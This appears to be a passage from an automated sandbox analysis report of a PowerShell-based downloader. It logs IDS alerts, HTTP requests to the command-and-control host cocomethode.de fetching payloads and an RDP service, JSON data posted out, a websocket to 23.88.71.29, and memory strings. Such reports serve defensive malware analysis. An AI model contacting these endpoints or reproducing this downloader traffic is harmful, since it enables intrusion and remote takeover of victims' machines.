6c 00 75 00 72 00 65 00 41 00 63 00 74 00 69 00 6f 00 6e 00 73 00 22 00 3d 00 68 00 65 00 78 00 3a 00 38 00 30 00 2c 00 35 00 31 00 2c 00 30 00 31 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 33 00

Source: Joe Sandbox View

IP Address: 23.88.71.29 23.88.71.29

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49742 -> 104.21.1.51:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49740 -> 104.21.1.51:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49738 -> 104.21.1.51:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49755 -> 104.21.1.51:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49761 -> 104.21.1.51:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49766 -> 104.21.1.51:443

Source: global traffic	HTTP traffic detected: GET /OKNf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c1f55782c1aa93f7ccdfccb20f78866afc8074889dd125916882b0ad29e2f1b013f9f235865a5d8e4be95dccfbcf72fc95b375ca83c0d95f43fa19f849/Windows%20Defender/16/16/user/206 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd07efb8ae519f91549752 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 303
Source: global traffic	HTTP traffic detected: GET /file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796832c4fd288b62c8ec411566a8647c0dcf0e876594e63eefc32abbe62cf7e16991160bf42ec5699a35966baaa81d918ee8e0cfd67495b55d4aa2a39a45e1d3f3bae765c97e7ceb82114cdc97d1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba96371e053b9048f0e3e116858dfb6bb0 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 303
Source: global traffic	HTTP traffic detected: GET /file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766867e1712c1111f93d41207e9a66b4c79a2a22a8f3f977554b38c2c12b8d6d0f874d5d28de666900008551a5a74884807c221f677dd119de8925270a5159b4d5954723b3d86ef67de15dc0d9b5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d5a67dc965e450f19373 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 85
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d5a67dc965e450f19373 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 86
Source: global traffic	HTTP traffic detected: GET /file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5dbb1a738ebd5d59c383ddda7ae733b974b62b8e600a867205fe86acb615bbb394f676a9487f0a6d13dbf465585b805cd5c966e21c3b43adfc54fca65e29f108cd32057c0ab0de90b77ba7bdfc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d5a67dc965e450f19373 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 62
Source: global traffic	HTTP traffic detected: GET /file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df77ed6fc10cd2b8f1bf6e1419afd1b8e652d60820a56f5d872b9832d58cfe65348bdb616db23e43f7972daf391f13bd6a69c891902807aad423627811c8e0d4aa7ee939d745201eed806ee979fa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 140
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 69
Source: global traffic	HTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa2b8fd57cf5f0bd3f24c68ed185d64a9ac7de4983fe5e3122fca7943699695f922096bc194352a7f8167d0f40a86605fb5fcbc94e2f07cb01d75a37ad6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 200
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 97
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 64

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /OKNf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c1f55782c1aa93f7ccdfccb20f78866afc8074889dd125916882b0ad29e2f1b013f9f235865a5d8e4be95dccfbcf72fc95b375ca83c0d95f43fa19f849/Windows%20Defender/16/16/user/206 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796832c4fd288b62c8ec411566a8647c0dcf0e876594e63eefc32abbe62cf7e16991160bf42ec5699a35966baaa81d918ee8e0cfd67495b55d4aa2a39a45e1d3f3bae765c97e7ceb82114cdc97d1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766867e1712c1111f93d41207e9a66b4c79a2a22a8f3f977554b38c2c12b8d6d0f874d5d28de666900008551a5a74884807c221f677dd119de8925270a5159b4d5954723b3d86ef67de15dc0d9b5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5dbb1a738ebd5d59c383ddda7ae733b974b62b8e600a867205fe86acb615bbb394f676a9487f0a6d13dbf465585b805cd5c966e21c3b43adfc54fca65e29f108cd32057c0ab0de90b77ba7bdfc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df77ed6fc10cd2b8f1bf6e1419afd1b8e652d60820a56f5d872b9832d58cfe65348bdb616db23e43f7972daf391f13bd6a69c891902807aad423627811c8e0d4aa7ee939d745201eed806ee979fa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa2b8fd57cf5f0bd3f24c68ed185d64a9ac7de4983fe5e3122fca7943699695f922096bc194352a7f8167d0f40a86605fb5fcbc94e2f07cb01d75a37ad6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /StaticFile/RdpService/87 HTTP/1.1Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /StaticFile/TermServiceTryRun/12 HTTP/1.1Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /api/check HTTP/1.1Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: O2K7+xXYk0GzErsWSELewg==Sec-WebSocket-Version: 13

Source: global traffic

DNS traffic detected: DNS query: cocomethode.de

Source: unknown

HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd07efb8ae519f91549752 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 303

Source: powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: powershell.exe, 00000008.00000002.3597293545.000001B580C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cocomethode.de
Source: svczHost.exe, 00000014.00000002.4755964850.000001B9020BA000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4755964850.000001B9020A9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cocomethode.de:443/
Source: powershell.exe, 00000002.00000002.3490034644.0000020C7FA90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3752962645.000001F3FBAB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3642064416.000001B5FCBF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4419408500.000002A49A5E9000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4754714057.000001B8FEF3E000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000003.4296169846.000001B8FEF7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.3490034644.0000020C7FA90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3752962645.000001F3FBAB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3642064416.000001B5FCBC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4419408500.000002A49A5E9000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4754714057.000001B8FEF3E000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000003.4296169846.000001B8FEF7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.4187601187.00000166F2DCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.3756553973.000001F3FBE40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000008.00000002.3643874588.000001B5FCF92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.c7
Source: powershell.exe, 00000003.00000002.3761123392.000001FBFD0E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000002.00000002.3472549645.0000020C68EA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3487490878.0000020C77A34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3487490878.0000020C77B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3742325021.000001F390078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3742325021.000001F39021B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3633648179.000001B590079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58164A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.4144913601.00000166901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.00000166814F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.3472549645.0000020C67BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F38022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzT
Source: powershell.exe, 00000002.00000002.3472549645.0000020C68D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3472549645.0000020C68D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: svczHost.exe, svczHost.exe, 00000014.00000002.4765472868.00007FF799780000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
Source: powershell.exe, 00000002.00000002.3472549645.0000020C679B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482581000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765472868.00007FF799780000.00000004.00000001.01000000.00000009.sdmp, powershell.exe, 00000018.00000002.3943366985.0000016680001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.3472549645.0000020C67BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F38022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzT
Source: powershell.exe, 00000002.00000002.3472549645.0000020C68D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3472549645.0000020C68D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: myRdpService.exe	String found in binary or memory: http://www.gstatic.com/generate_204
Source: svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204y
Source: powershell.exe, 00000008.00000002.3643874588.000001B5FCF92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c9
Source: powershell.exe, 00000003.00000002.3761350749.000001FBFD102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.3490034644.0000020C7FA90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3752962645.000001F3FBAB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3642064416.000001B5FCBF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4419408500.000002A49A5E9000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4754714057.000001B8FEF3E000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000003.4296169846.000001B8FEF7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765472868.00007FF799780000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exe	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4350731384.000002A492626000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B902A48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765472868.00007FF799780000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF7998F2000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.3911058109.00007FF7998F2000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: svczHost.exe, myRdpService.exe	String found in binary or memory: https://aka.ms/nativeaot-c
Source: myRdpService.exe	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: powershell.exe, 00000002.00000002.3472549645.0000020C679B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.0000016680001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.3702779169.000001F38022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B580C5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5805CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A483D5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de
Source: powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd0
Source: powershell.exe, 00000003.00000002.3702779169.000001F380E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d
Source: powershell.exe, 0000000D.00000002.3932623749.000002A482942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A483D5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7a
Source: powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba96371e053b904
Source: powershell.exe, 00000003.00000002.3702779169.000001F38022C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/OKNf
